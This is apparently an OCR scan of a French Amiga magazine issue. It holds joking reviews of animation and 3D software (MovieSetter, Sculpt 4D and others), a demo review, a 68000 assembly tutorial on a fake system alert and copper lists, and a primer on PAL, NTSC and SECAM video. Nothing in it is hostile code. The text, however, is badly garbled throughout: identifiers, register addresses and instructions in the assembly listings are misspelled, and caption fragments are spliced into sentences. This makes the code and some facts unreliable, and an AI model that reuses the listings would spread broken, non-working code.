Ce printemps démarre très mal. J'ai oublié les clefs de la grotte en France (deux jours de boulot avec un canif pour détruire ma serrure 8 points en granit). En arrivant, je suis tombé en pleines émeutes indépendantistes. Les chinois ont réquisitionné mon solex. Ma femelle attitrée s’est barrée avec la bête du Gevaudan en embarquant mon argenterie en polyester véritable made in Taiwan. Mon voisin s'est payé une massue toute neuve, les baba cools commencent à se méfier et le plombier ne passe pas avant trois semaines.
J’ai DPAINT III, j’ai DPAINT III, raaaahhhhhhh, que c'est bon, que c’est bon (et A-News No. 12). Chers DPAINTdeuistcs, l'essayer c'est l'adopter. L'animation est nickel (ça flashe pas un pet'), l’aéro est beaucoup mieux, la mise en perspective est plus rapide que BIOMAN. La fonction MOVE est très très sympa. C’est vraiment le soft qui va bien.
Malgré les vacheries, tout à fait justifiées, que j'avais écrites au sujet de ComicSetter. GoldDisk m’a envoyé son dernier soft : MovieSetter. D s'agit d’un programme d’animation réunissant, à mon avis, tous les procédés valables de ses predecesseurs (DeluxeVideo, AegisAnimator). Suivez-moi, attention aux bitplanes qui sont d'époque.
La boîte, en carton plutôt léger, joue la carte "comme au cinéma" avec une typo cinémascope et une illustration visant à regrouper tous les genres du cinéma sur 21cm de large. Dans mon empressement à vous fournir l’information la meilleure, je me jette sur cette boîte pour en extraire le contenu (elle est un peu abîmée maintenant). J'ai trouvé un manuel, une carte de registration et deux disquettes (GoldDisk a fait imprimer un grand panneau STOP au fond de la boîte, quels rigolos ces ricains) Le manuel en anglais est très bien fait. La présentation est aérée cl ponctuée de crobards de la
mascotte du programme: un espèce d’ersatz de loup à la Tex Avcry un poil ramolo. Toutes les fonctions sont expliquées avec un rappel de leur représentation à l'écran. L’aprentissage du programme est très rapide et rien ne reste dans l’ombre très longtemps. Un tutorial du tonnerre.
CCCHHHHAAAAAaarggeeezzz!!!. Le soft peut tourner avec 512k et 1 drive mais n’est exploitable réellement qu'avec 1 méga et deux drives. Encore une fois, je retrouve cette protection «c* cbtMjji» qui consiste à demander un mot d’une phrase d'une page du manuel. Ca m’a mis de très mauvaise humeur et j'ai même failli dire des vilaines choses.
Pendant que ça charge (c'est un drive Moulinex sur le 500, non?), je m’en vais vous expliciter le principe de l’animation avec MovieSetter. Le fond est une image IFF basse résolution qui peut apparaître par volets et scrollcr sur elle-même horizontalement ou verticalement à la demande. La palette est celle de l’image de fond précédemment citée. On ne retrouve pas le concept de cells cher à certains programmes que j'ai, il y a peu, descendu en flammes dans les colonnes de ce canard. Il s’agit en fait de "brosses animées" c'est à dire d'une serie de brosses attachées dans un ordre défini (même
système que la brosse animée de DPAINT III mais pas compatible, dommage). Certes, ce système n’est pas nouveau; on avait déjà la même combine sur DeluxeVideo première version mais, vous verrez ça plus bas, la réalisation de celle brosse animée (MovieSetter appelle ça un SET, je vais faire pareil, ça fera américain, yeah man) est maintenant simple et sans contraintes. En plus, ce programme permet de ponctuer votre animation de sons et d’échantillons qui ajouteront une touche SCHTIK - POUM - RACLACLA à vos élucubrations dysnéiennes.
C’est chargé. Au milieu de l'écran, une petite fenêtre contient un panel de touches genre magnétoscope : compteur d'images, rembobinage à zéro, marche arrière, pas à pas arrière, neutre, pas à pas avant, lecture, avance en fin d’animation (MovieSetter appelle ça une Production, je vais faire pareil, ça fera cinéphile branché technique, wah, le mec).
Je me charge un fond de la disquette de clip-art fournie. Menu Event, Background select, la "boite de requête" apparait, Dircctory Background, ça charge puis le programme me propose une série de volets d’apparition variés ou une arrivée directe, un petit click et c’est boa Allons, animons. Pour réaliser une animation, on crée une pistc?track à laquelle est attachée un Set d'animation (dessins succssifs d'un mouvement). Je sélectionne le menu Track New qui ouvre le requester de chargement. Je charge un Set parmi ceux disponibles sur la disquette (pas tous très chouettes mais nombreux et
variés). Avant de démarrer, je rembobine la Production puis je commence à poser les dessins sucessifs de mon Set. Le programme avance automatiquement d’image en image, facile!.
Evidemment, chacune des positions est modifiable, effaçable... On peut commencer à animer un set à partir de n'importe quelle image et j’ai réussi à faire tourner dix sets dans dix Tracks différents dans la même image sans ralentir l’animation. Puissant!
Les Sets ne sont pas des fichiers figés et on peut les modifier à tout instant grâce au Set Editor. On accède au Set Editor par le menu Spécial ou directement par le WorkBench sans entrer dans MovieSetter (ce stupide programme demande quand même le code à aller pêcher dans le manuel). Bref, une fois dedans, on se retrouve dans un utilitaire de dessin où on reconnaît toutes les commandes de DPAINT dans une présentation en bandeau vertical très ressemblante. Sur la partie gauche de l’écran, on retrouve, outre les touches "magnétoscope" du module d'animation des fonctions couper coller et un
icône permettant de régler le "point de référence" de la brosse en cours (ce point permet un calage très précis du mouvement lors de sa mise en scène).
On peut charger et éditer les Sets existants, dessiner directement ou charger des brosses IFF (on peut même charger une image entière et en extraire des brosses). D n'y a pas de comraintes de taille, pas de "grille de référence" comme sur DeluxeVideo. C’est immédiat. Bien entendu, on peut sauvegarder son boulot, opérer des modifications sur des Sets déjà intégrés dans des Tïacks de votre Production et tout ça sans manipulations complexes.
Comme je l'ai écrit plus haut, je n’ai pas eu l'impression de limitations dans le nombre de Tracks (sauf mémoire). On peut, en plus, s’offrir le luxe de quelques Finitions faciles à réalisa- grâce au menu Event qui hébergeait déjà Backgraund tout à l’heure. Sound permet d'ajouter un son (un échantillon IFF) à partir d'une image précise et de le jouer à la vitesse voulue et sur les canaux stéréo que l'on désire.
On avance donc pas à pas jusqu’à l’image qui nous intéresse (choc, apparition, rebond ou autre) et on sélectionne Sound; on charge un sample; on règle sa vitesse sur un clavier d'un octave choisi parmi quatre; on détermine les voix utilisées et hop, voilà. ColorCycling permet de regler et d’exécuter un cyclage couleur.
Palette permet de varier une ou plusieurs couleurs. Timing permet de faire varier la vitesse de défilement de la Production pendant son déroulement. Loop, enfin, permet de boucla sur une série d'images déterminée. Toutes ces fonctions sont précises à l'image près et très faciles à mettre en oeuvre.
Enfin, le menu Spécial recèle quelques commandes qui simplifient la mise en scène des Sets: Borders montre ou cache les bords des brosses des divers Sets à l’écran, History affiche les positions précédentes des brosses du Sel ce qui facilite le contrôle des trajectoires. Guides s’occupe de créer automatiquement des trajectoires par interpolation.
Une option permet de basculer l'affichage en interlace sans gain de résolution effective mais juste pour limiter les effets de "lignes noires" lors d’un shoot vidéo.
MovieSetter est un très bon programme d’animation à l’esprit Cartoon représentant une alternative intéressante au format ANIM.
On apprend à s’en servir très rapidement. 11 marche bien et sans limites. Voila un programme qui mérité un YETi d’or (ça va pas Le MovieClip Edilor Créer et éditer vos images 32-couleurs avec des outils de dessin.
Importer des fichiers IFF Imfonction "History" Pour montrer la progression de vos objets Te "StoryBoard Requester" Pour regarder les différents "segments" de voire production 16 A-News moi en ce moment, un YETi d’or, avec ce que j’ai en banque, wwaaahhhhü!)
El que donc, j'ai également essayé Elan Performer dont vous parlait Ed: le mois dernier dans son reportage sur l'AMIexpo. H s'agit d'un programme qui permet d'accéder très rapidement à des images et des fichiers d’animation dans de nombreux formats.
Pratiquement, on assigne à une touche du clavier une image ou une animation (il charge vraiment tout ce qu’on veut). On peut créer une séquence d'enchaînement, modifier les formats des animations (résolution, vitesse), créer des fichiers animation à partir d'images.
J'ai eu quelques difficultés à déterminer quel pouvait être la clientèle de ce produit très pro puisque sa grande puissance n'apparaît qu'avec beaucoup de mémoire interne et un ou des disques durs. Le Perfonner devrait intéresser les gens de la téléprojection (animations vidéo, salles de téléprojection, boîtes de nuit....) car il permet à la fois de tenir un ordre de diffusion préétabli et de réagir aussi vite que la miga arrive à charger le fichier.
Rituel de remerciement à la joyeuse société CIS à Talcncc qui m'etonnera toujours avec ses softs pro introuvables ailleurs ou alors si mais il faut chercher et j'ai pas le temps alors je m'adresse à eux même si, parfois, excédés par le lit de camp que j'ai installé dans leur magasin, ils me disent carrément que je ne suis pas leur meilleur client (je fais BOUH! Aux teigneux qui murmurent entre leurs dents que CIS me paye pour que je dise du bien d’eux. C'est archi faux. Je leur laisse juste le droit de sponsoriser mon caviar, mon harem de femmes lascives et mon écurie do formule 1 et ils
n’acceptent jamais).
Je signale à votre masse cérébrale que la société SYNDESIS. Célèbre dans le petit monde des masochistes du ray- tracing sans accélérateur pour son incontournable InlerChange (convertisseur de formats 3D), propose désormais InterFont : soft de création de polices 3D et de composition de textes pour le même sport II existait déjà quelques fonts (styles d’écriture) 3D, maintenant il y en aura beaucoup (le caractère pseuda divinatoire de celle phrase m'échappe totalement). En fait, le gros avantage de ce programme par rapport à un travail direct avec votre modeleur favori réside dans
]'alignement-espacement automatique des caractères sur une ligne.
Explication: Une fois votre font 3D construite, le plus dur est d’aligner les caractères nettement et de les espacer de façon harmonieuse.
Maintenant, InterFont s'en occupe tout seul.
Intcrfont comprend un éditeur de fonts qui fait office de composeur et aussi le célèbre InlerChange. L’ergonomie est discutable mais le résultat est correct.
Une brève : Silicon Graphics, fabricant des stations graphiques Iris, annonce que la prochaine génération de son Personal Iris se dealera à moins de S10.OOO. Sachez que la quasi totalité des images de synthèse devant lesquelles vous bavez sont conçues et calculées sur des stations Iris (TDI, Fantôme ...). Le pcrsonal Iris est environ cinq fois moins puissant (vitesse de calcul) que ses grandes soeurs mais il dispose des mêmes capacités (1280*1024, 8 ou 24 bits, 68030 et coprocesseurs géométriques). Ic mac H va pouvoir s'accrocher, les autres aussi.
Chers téléspectateurs, il est l’heure de nous quitter car nous devons rendre l'antenne. Il ne nous reste plus qu'a vous souhaiter un bon moi d’avril. Toute l'équipe qui m’a aidé à préparer celte émission se joint à moi pour vous remercier de l’avoir suivie. Nous espérons vous retrouver nombreux le mois prochain à la même heure et je laisse le mot de la fin à notre invité vedette CHORIZO K1D:
• ” , ... GAAATEAUül" EL YETi dit des inepties la démo du mois Ce
mois-ci, c'est la "KefreitS Mégadémo' que j'ai lesté. Au moment
où vous lirez cet article, je serai en Ecosse.
Merci à tous ceux qui m'ont appelé...
1. Description La première partie, "Psychoballs” est un petit
chef d’oeuvre... Après le chargement, et la décompilation de
l'in- tro apparaît le sigle Kefrens, puis deux disquettes puis
enfin le scrolling. Entre les deux disquettes passe un scroll
vertical, où le coder envoie des messages... Au bas de l’écran
se trouvent quatre vu-mètres. Devant ces derniers, un autre
scrolling, mais horizontal et sinusoïdal, défile. Trois boules
(Un peu le style du jeu WIZBALL) passent et rebondissent.. En
arrière plan, défilent des étoiles. Le tout, au son d'une
superbe musique... La seconde partie est plus simple. En haut
de l'écran, un sigle du groupe. Au milieu, un scrolling qui
rebondit, double de hauteur, ondule, etc... Plus bas, des
barres rebondissent, et au bas de l'écran, se trouve le même
style d’effet d’eau que dans la IT mégadémo, mais en moins
bien rendu... La troisième partie débute superbement... Une
image digitalisée de la forêt vierge avec des bruits d'animaux
en fond. Puis, une des balles de la première partie apparait
et rebondit Au bas de l’écran, un énorme scrolling défile.
Derrière ce dernier, se trouvent des vu-mètres... La
quatrième partie se compose, elle, du traditionnel sigle qui
se ballade de droite à gauche (et inversement!), d’un scoll au
bas de l'écran avec des dégradés de couleurs, et des anima
tions de barres S l'intérieur. Au milieu, des étoiles passent
horizontalement, et de derrière le scrolling, montent des ima
ges qui reste un moment au milieu de l'écran... La cinquième
partie, baptisée "Bouncing ones" est un peu surprenante... En
effet, elle met en jeu, dos animations en vectoriel, des
animations d'étoiles et de tête de mort et un scrolling, tout
cela en même temps et au milieu de l'écran... En bas de
l'écran, le sigle Kefrens se balade, encore et toujours de
gauche à droite.
La dernière partie est la plus belle de toute... Elle se compose d’une tête de pharaon superbement bien dessinée en dégradés de verts et de bleus, d’une pyramide (celle de Khéops, I thinh!). A gauche et à droite, de cette dernière, se trouvent deux colonnes de fumée autour desquelles s'entoure un scroll. Au bas de l'écran, un équaliseur... Et dans le fond, des étoiles à la manière du boot Wild Copper. Et tout ça, accompagné d’une superbe musique...
2. Qualités et défauts Pas de bugs à ma connaissance, de beaux
graphes, de belles musiques (peut-être un peu trop destroy,
parfois...), cette mégadémo a tout pour plaire.
Je renouvelle l'annonce du dernier numéro: CONTACTEZ MOI SI VOUS AVEZ DES MEGADEMOS RECENTES ET VALABLES... je lui mets comme note 15 20 Musique: 3 Originalité: 4 Animation: 4 Dessin: 4 Si vous voulez me contacter écrivez à: Emerlc Fermas 11, Rue du Pressoir 75020 PARIS France Tél:(l)47-97-84-7 ?a Depuis le mois dernier, tout est bouclé et on connait Vadresse. La suite, la suite... texte:
DC. B
DC. B
DC. B
DC. B end Passons maintenant à un petit exemple qui produit un
résultat très visuel et cela en quelques lignes. Ce pro
gramme ouvre Intuition, appelle la fonction DisplayAlert et
referme Intuition. Paf!, un gourou, une alerte à la bombe
sans bombe et totalement indétectable dans un bagage à main.
; constantes ExecBase ( Indirect.)
Equ 4 ; pointeur sur la base de ExecBase ; offsets des fonctions de Exec OldOpenLibrary equ -408 CloseLibrary equ -414 ; offsets de la fonction d’intuition qui nous intéresse DisplayAlert equ -90 ; début du programme start: movem.l d0-d7 a0-a6,-(sp) ; sauvegarde des registres move.l IntuitionLib,al ; charger le pointeur sur la chaine intuition.library dans a 1 move.l ExecBase.aô ; adresse d’ExecBase dans a6 jsr 01dOpenLibrary(a6) ; ouvrir Intuition move.l dO.IntuiBase ; sauvegarder le pointeur sur IntuitionBase pour pouvoir utiliser Intuition plus tard et finir en fermant la library move.l
d0,a6 ; IntuitionBase dans a6 moveq 0,d0 ; n' de l’alert ici 0 move.l texte,a0 ; charger le pointeur sur le texte moveq $ 33,dl ; hauteur de l’alerte en nb de lignes basse resolution max = 256 en pal =200 en ntsc JSR Display Alert(A6) ; afficher l’alerte et attendre un clic bouton de gauche de la souris move.l IntuiBase.al ; charger IntuitionBase dans al remarque on aurait pu faire move.l d6,al mais c’est plus clair comme ca move.l ExecBase.aô ; idem avec ExecBase dans a6 jsr CloseLibraiy(a6) ; fermer Intuition movem.l (sp)+,dO-d7 aO-a6 ; restituer les registres rts ; retour au CLI
$ 00,$ fc,$ 0c," ACHETEZ TOUS",0,$ 01 $ 01,$ lb,$ 16,"ANEWS",0,$ 01 $ 00,$ fO,$ 20,"LE JOURNAL DEDIE",0,SOI $ 01,$ Oc,$ 2a,"AL’AMIGA",0,0 Les 2 premiers octets donne le x et le 3 emme le y où le texte doit être affiché (basse résolution 320 * 256 (ou 200)). 0 termine la chaine et $ 01 indique qu’il y a une autre chaine à afficher. Terminer le texte par un dernier 0, Reste plus qu’à taper et à assembler le programme.
Avec l’aztec : as gag.a puis ln gag.o et normalement si depuis votre CLI vous lancez gag..... Pour les utilisateurs de seka: 1 - enlever le dseg 2 - changer les equ en = Oui je C je C ce qui vous intéresse c’est comment faire des copper listes pour programmer des demos.
Bon d’accord vous avez gagné on commence dès aujourdhui.
Leçon n01 affichage d’un écran: On va utiliser un écran basse resolution en 2 couleurs (1 BitPlane) mais le principe reste le meme quel que soit le nombre de BitPlanes.
; REGISTRES CUSTOM CHIP DMACON equ $ dfTO96 ; contrôle dma w DMACONR equ $ dfTO02 ; contrôle dma r COLOROO equ Sdff 180 ; couleur 0 COLOROl equ $ dffl82 ; REGISTRES COPPER COP1LC equ $ dfTO80 ; 1 ere copper liste COP2LC • equ Sdff084 ; 2 eme copper liste COPJMP1 equ $ dff088 ; saut a la 1 ere copper liste COPJMP2 equ $ dff08A ; saut a la 2 eme copper liste ; REGISTRES BITPLANE BPLCONO equ SdfflOO ; contrôle bitplane 0 BPLCON1 equ $ dffl02 ; 1 valeur de scrolling BPLCON2 equ $ dffl04 ; 2 priorité sprite playfield BPL1PTH equ$ 0E0 ; ptr bitplane 1 BPL1PTL equ $ 0E2 BPL1MOD equ Sdff 108 ; modulo pour
bitplane impair BPL2MOD equ SdfflOA ; modulo pour bitplane pair DIWSTRT equ $ dfïï)8E ; départ fenetre écran DIWSTOP equ $ dfT090 ; fin fenetre écran DDFSTRT equ $ dfT092 ; bitplane dma start DDFSTOP equ Sdff094 ; bitplane dma stop ; CI A-A REGISTRE PORTA ( BOUTON DE SOURIS ) CIAAPRA equ SBFE001 libname version(a i ,d0) libraiy(al) taille flags(dO,d 1) prt taillc(al,d0) dseg IntuiBase:
DC. L IntuitionLib:
DC. B I variables 0 "intuition.library",0 OpenLibrary equ -552
CloseLibrary equ -414 AllocMem equ -198 FreeMem equ-210
Forbid equ -132 Permit equ-138 ExecBase equ 4 Planenuniber
equ 1 Width equ 40 ; largeur des plans en octets Heighl equ
256 ; hauteur 256 lignes Planesiæ
equWklth*Height;taUleduBilPlane=40cctets(320)*2561igncs
Clsize equ 3 * 4 ; taille de la copper liste 3 instructions
de 4 octets CHIP equ 2 ; flag Chip memory CLEAR equ
CHIP+$ 10000 ; flag Chip roemcey initialisée avec des 0
StartList equ 38 start: movem.1 dO-d7 aO-a6,-(sp) ; allouer
la cqpper list et les bitplancs movc.l ExecBase,a6 move.l
KCLsize.dO move.1 «CHIP.dl jsr AuocMem(a6) move.1 dO.CLadr ;
sauver le pointeur sur la copper liste beq Fin ; si erreur
goto fin move.l Planesize*Planenumber.dO ; a noter que tout
est prévu pour rajouter des BitPlanes move.1 KCHIP.dl jsr.
AllocMem(a6) move.l dOPIane ; sauver le pointeur sur le
BitPlane beq FreeCop ; si erreur libérer la copper liste et
exit moveJ graphics,a 1 moyeq 0,d0 jsr OpenLibrary(aô) ;
ouvrir la Graphics library move.l dO.GfxBasc jsr Forbid(a6) ;
supprimer le multitâche ; installer la copper liste move.1
Cladr,aO ; adr de la coppcr liste dans aO move.l PlanerlO ;
adr du plan 1 dans dO move.w BPLlPTH,(aO)+ ; première
instruction copper swap dO ; octet de poid fort move,w
dO,(aO)+ move.w BPLlPTL,(aO)+ ; deuxième instruction coppcr
swap dO ; octet do poid faible move.w dO,(aO)+ movc.l
Sfffffffe,(aO) ; fin de la copper liste move.w $ 03aO,DMACON
; initialiser le dma ; entre autre supprimer le pointeur
souris ; NB il doit y avoir un bug cela ne marche pas
toujours correctement ; initialisation du copper ; mitialiscr
les registres copper move.1 Cudr.COPILC clr.w COPJMP1 ; choix
des couleurs move.w WSOOaf.COLOROO ; couleur 0 bleu pale
move.w «SOOOO.COLOROl ; couleur 1 noire ; et pourquoi pas ?
; initialisation du playfield ; définir la fenetre d'affichage ( ici valeurs standard ) move.w S3081 .DIWSTRT move.w S30c 1 .DTWSTOP ; taille de la coppcr dans dO ; oubien move.1 CLEAR.dl move.w $ 003c,DDFSTRT move.w $ OOd4.DDFSTOP ; écran monocromc en basse resolution move.w %000100100000000Û,BPLCONO clr.w BPLCON1 clr.w BPLCON2 clr.w BPL1MOD clr.w BPL2MOD ; dma activée - affiche l'ecran move.w S83cO,DMACON btst 6.CIAAPRA ;test souris bne lest ; tant que pas de clic boucler ; liste copper precedente a nouveau activée move.l GfxBase,a6 move.l StartList(a6),COPlLC ; permet de récupérer
l'ancienne copper liste clr.w COPJMP1 ; copper liste startup activée move.w S8020,DMACON ; réinitialiser le dma move.l ExccBase,a6 jsr Pcrmit(a6) ; permettre le multitâche movc.l GfxBasc.al ; fermer la graphies library jsr CloseLibrary(a6) ; libérer mémoire de le coppcr liste et du BitPlane move.l Plane.al move.l PIanesize*Planenumbcr,dO jsr FrceMem(a6) FreeCop: move.l Cladr.al move.l CLsizc,dO jsr FreeMem(aô) Fm: movcm.1 (sp)+,d0d7 a0-a6 ; restituer les registres rts Plane: dc.l 0 Cladn dc.l 0 GfxBase: dc.l 0 graphies: dc.b "graphics.library",0 Et voilà il ne vous reste plus qu'à essayer.
Pour ceux qui n'ont pas de docs de plus amples explications le mois prochain, poux les autres l'extension à plusieurs BilPlanes ne devrait pas poser de problèmes.
NB: avec le deuxième exemple vous allez afficher de la ram non inilialisée donc ne vous étonnez pas si le résultat de vos manipulations est quelque peu suiprenanL Pour y remédier remplacez le CHIP par CLEAR dans l'allocation du BitPlane et vous aurez un écran tout noir mais bleu pâle en fait donc pas noir (noir, c'était une image pour dire qu'il était vide comme un trou noir. On dit jamais un trou bieu ciel).
Sur ceux tchaoooo (rom Roméo el Rapido et pour tout problèmes, idées, mépris définitif tapez 36 15 code DEEP bal ROMEORAPID (ou écrire à A-Newi). Bien entendu ces programmes seront en téléchargement sur DEEP dès que possible.
?a Essai SCULPT4D Sculpt 3D était malade, il avait attrapé la deuxzéroversionite, bonne maladie qui l’a obligé à se repenser et pour pouvoir survivre, à s’améliorer.
Quelles nouveautés dans cette version?
Tout d’abord le prix, environ 1000 Francs Suisses ou 4000 Francs Français. Pour ce prix, je me suis dit qu’ils auraient fait l’effort de le traduire en Français, mais non : nous sommes encore et toujours les dindons de la farce.
En gros oit sont les améliorations? Dans la rapidité du rendu final (image), en plus des modes connus, des calculs sans l’option Z Buffer accélèrent par trois le calcul de l’image, aussi rapide que VideoScape 3D.
Mais attention au mélange des surfaces lors de plans croisés! Une taille d’image a aussi été rajoutée, c'est l'option Vidéo, qui occupe l’intégralité de l’écran en overscan total.
Une des innovations et non des moindres, est la posibilité de rentrer les coordonnées des points au clavier. De nombreuses options peuvent s’activer depuis le clavier, ce qui par rapport à la version 3D est très agréable. Les développeurs de BYTE by BYTE nous ont aussi donné une grille paramétrable, et des options SNAP sur les points et sur la grille.
Un ensemble de points et de lignes peuvent se grouper et se sauver par des noms.
Exemple : "Façade Nord', ’fenêtre" etc... Très pratique lors de la construction d’objets complexes, car il est possible de les sauver indépendamment et de les rappeler à tout moment Une option EXTRUDE permet enfin de créer une surface à plat et de la tirer en hauteur pour lui donner un volume, cette option je l’attendais, et rien que pour cela j’aurais acheté ce logiciel.
Par Patrick Conconi Pour le choix des surfaces, des bruits avaient couru que comme dans DBW Render il serait possible de coller à une surface un pinceau (BRUSIT) pour obtenir un mur de brique, un panneau de bois, mais non, rien de tout cela mais une option supplémentaire, le métal.
Sculpt 4D est aussi un programme d’animation qui permet de faire des animations sans pareille. Il reprend l’ensemble des commandes d'Animale 3D avec quelques améliorations au niveau de la saisie et une commande supplémentaire.
Mon avis personnel sur SCULPT 4D est très favorable, avec cependant une restriction.
C’est au niveau des temps de calculs pour les animations et les calculs d’image. Déjà nettement plus rapides que sur 3D. Ils vous bloquent la machine pendant plusieurs jours pour une animation. L’idéal est de posséder une ¦ ; mua |[n|l‘i'i j'id ...35.351 North:
35. 351
0. 001*11 lL ¦HSS ü rai" L'écran de travail de SCULPT 4D avec ses
trois fenêtres de vues dessus, de coté Est et de coté Nord. La
petite fenêtre sert à donner les coordonnées et à les lires
ainsi que se positionner pour les animations.
Cane accélératrice qui augmente de environ 400% la rapidité de calcul d’une image, mais voila nous n’avoas pas tous les moyens de se l’offrir. Ce qui fait que personnellement je ne me sers pas d’Animate pour mes animations, mais de Vidcoscape 3D. Par contre pour obtenir des images au rendu fantastique, Sculpt 4D est LE programme par exellence. Avant je me servais de Forms in Flight pour éditer des objets, puis je passais par Interchange pour les convertir au format Sculpt et obtenir un bon rendu. Maintenant avec cette nouvelle version de Sculpt je vais pouvoir éditer directement mes objets et
ceci d’une manière très simple.
En résumé, un programme qui souffre de sa documentation en Anglais, mais qui pour l'instant reste le meilleur dans sa partie.
- Patrick Conconi PROFONTS ProFonts I Béryl Coal Gold Granité
Marble Platinum Pyrite Quartz Schist Zircon New Horizons
Software annonce Profonts I et II pour son traitement de
texte Prowrite. Volume I contient dix fonts de style
"professionelle" (pour correspondance, etc), et le deuxième
"tome" est une série de styles décoratifs (pour préparer
publicités, entêtes de lettres, etc). Des sorties de bonne
qualité (voir exemples) sont possibles sur laser ou imprimante
matricielle 24 aiguilles. Prix aux Etats-Unis : $ 35 chaque
disquette.
(New Horizons, PO Box 43167, Austin, TX 78745. USA, tél 512-328-6650).
ProFonts II: Bone Broadway IBMmdicif Corundum =on Felclspor Galena GRAPHITE Gravel icrfe leo Mica OLIVINIi Pan& Jncrvic StHlÜ Oblique Obsidian S erperiine sa StM Stencil Spincl Talc Tiffany T01ÆES70ITE Tourmaline Ultra ?a A-News Yeû-AMIGA-VIDEO 1-2 J’ose espérer que vous connaissez tous le principe de la télé en noir et blanc, voire en couleurs (pour avoir la couleur, relisez trois fois un bouquin sur le noir et blanc, le reste, c’est du pipeau). Une fois que vous avez ingurgité le fonctionnement du tube cathodique, vous l’apprenez à l’envers et vous avez une caméra.
Face à l’abondant courrier que je reçois concernant la video, je me suis enfin décidé à vous faire un espèce de petit récapitulatif des bases à piger quand on tente de faire coexister l’AMIGA (tm) (c) avec un magnétoscope.
Et blanc qui ne présentent aucun intérêt en ce qui concerne la miga mais qui permirent à des mecs comme Léon Z d’ac- La théorie du bidule est simple: découper une belle image optique en une série de lignes formées elles- mêmes de points.
¦j Chaque point subit les sautes d’humeur d’électrons. Avec tous ces électrons, on module un courant électrique de 1 volt environ qui, une fois lancé dans une télé reconstitue l’image.
Le plus dur est de trouver un bon système permettant d’avoir la même image au départ et à l’arrivée. Pour y arriver, il fallait définir un standard précisant le nombre d’images par seconde, le nombre de lignes par image, un code pour dire que la ligne était finie et que, par conséquent, le spot devait passer à la ligne suivante, un code pour dire que l’image était entière et que, donc, on pouvait en faire une autre après et toutes ces sortes de choses qui vous transforment une théorie simple et très jolie en une formation éducatel en deux ans de réparateur télévision. Les premiers à
réussir à ce sport furent les ricains, pressés qu’ils étaient d’envahir la planète pour amortir le prix de l’homme qui valait trois milliards. Je ne vous parlerai pas des premiers standards noir quérir le droit de nous em...bêtcr jusqu’à leur mort. Par contre, penchons nous sur les trois standards actuels. Ils ont en commun la même façon de définir l’image : une image est composée de deux trames de lignes horizontales, une trame paire composée des lignes paires, une trame impaire faite avec les lignes impaires. Une image est donc la résultante de deux balayages de l’écran (une fois de haut
en bas, une fois de bas en haut). Mais franchement, c’est tout cc qu’ils ont en commun.
22 A-News Connaître leurs différences, c’est mieux savoir les apprécier.
? Le NTSC, standard américain avec variante japonaise, est le plus ancien standard couleur et le plus mal foutu (à tel point que le siglc National Télévision System Committee est souvent transformé en Never Twice the Same Colors - jamais deux fois les memes couleurs -). Il est cadencé à 60Hz.
(fréquence du courant électrique US).
Cette cadence permet trente images par seconde, soixante trames, mais limite la résolution horizontale à 525 lignes contre 625 aux standards 50Hz.
Le gros point faible de ce standard réside dans le codage des informations couleur qui est minable par rapport aux capacités des tubes et des capteurs des caméras actuelles. Toutes les sorties vidéo des ’migas américains sont cadencées en 60Hz (même la péritel) ? Le PAL (Phase Alternation Line) est le standard le plus répandu. Cadencé à 50Hz, il n’offre que 25 images seconde mais d’une résolution de 625 lignes. C’est théoriquement ce que devrait fournir les modulateurs vendus par KOMO DOOR pour le 500 et le 2000 ? Le SECAM (abréviation naze de "séquentiellement et à mémoire") enfin, notre
beau standard franchouillard mis au point par Henri De France et très répandu en France, en Egypte et en URSS ces deux derniers pays étant mondialement réputés pour leur parc de téléviseurs couleur. Pourquoi tant de haine ??
C’est vrai, le SECAM est un bon standard qui préserve la pureté des couleurs même à 40 degrés, même quand la saleté est incrustée au plus profond du linge grâce à son procédé de balayage alterné qui fait une image stable et nette comme au premier jour. 11 ne diffère du PAL que par sa façon de coder la couleur (on peut lire du Pal sur un magnétoscope SECAM mais en noir et blanc). Bref, on est bien mieux que les aubes mais on est tout seul.
Je pense que vous saviez déjà la majeure partie de ce que je viens de récapituler, c’était nécessaire pour la suite.
Et j’embraye sur les façons de transporter le signal vidéo (le petit courant éléctrique que nous modulions au début de cet article avec la complicité d’électrons excités). Le signal vidéo c’est de la lumière et des couleurs pour faire des images et du temps pour faire bouger les images. Ici, la lumière s’appelle luminance, la couleur chrominance, et le temps la synchro.
Quelques notions de base La première méthode consiste à tout faire passer dans le même fil en priant que ça ne se mélange pas. En PAL par exemple, on alloue de Ovolt à 0.3Volt aux signaux de synchro, 0.3Vo!i représente le noir, lVolt le blanc. C’est un peu plus tordu en SECAM mais le principe est le même. Dans ce cas, on parle de signal COMPOSITE. C’est ce type de signal qui est utilisé pour la télédiffusion.
On peut aussi véhiculer séparément les COMPOSANTES de l’image, c’est à dire des trois signaux couleurs primaires et la synchro. Le R-G-B-S ou R-V-B-S (Rouge, Vert, Bleu, Synchro) est le signal qu’expédie régulièrement votre ’miga vers son moniteur par l’in- termediaire de ce gros câble gris pas trop flexible au bout duquel se trouve une prise péritel.
Méfions nous par ailleurs de cette prise péritel que l’on trouve partout : tout individu sensé pourrait croire qu’à partir du moment ou cette prise est standard, tous les appareils qui en sont équipés peuvent échanger des images sans problème ; grave erreur, cette prise peut véhiculer une flopée de signaux différents et incompatibles.
Il existe un autre type de signal COMPOSANTES : le C - Y. Le C - Y consiste à dissocier les signaux luminance et chrominance ce qui offre une solution intermédiaire entre les deux systèmes précédents (plus clean que le composite, moins lourd que le composantes).
On vient de s’enfiler les standards, ouf!!. Ma prose n’est pas d’une grande valeur technique mais me suffit dans mon boulot de truquiste télé, pourquoi se saturer les neurones avec des idées plus complexes ?! Bon, je vous décris les formats vidéo et on parlera le même dialecte.
Le terme de format n’est pas une abstraction parabolique puisque la largeur de la bande magnétique servant à l’enregistrement détermine d’une façon tout à fait réelle les possibilités dudit enregistrement. On le sait, les capacités de mémorisation du support magnétique sont limitées; moins on "tasse", meilleure est la restitution et la tenue dans le temps. Le plus gros format actuel est le I pouce qui est encore utilisé dans de gros studios pour des productions nécessitant une très grande qualité et de nombreuses opérations de rclecture- réécriture pour les trucages.
Le format "pro" le plus répandu est le 3 4 de pouce avec deux variantes: le standard U-MATIC U-MATICsp et le standard BVU. L’U-MATIC est le plus vieux des deux et n’est plus utilisé que dans la production institutionnelle pour des raisons de manque de tenue de la chrominance en générations (une copie de l’original = 1ère génération, une copie de cette copie = 2èmc génération, etkaetera....) Le BVU n’est en fait qu’une version très améliorée de l’U-MATIC (chez SONY, l’éléctronique BVU permet de lire l’U-MATIC) qui code différcmcnt la couleur et intégré un time-code (une espèce d’étiquette pour
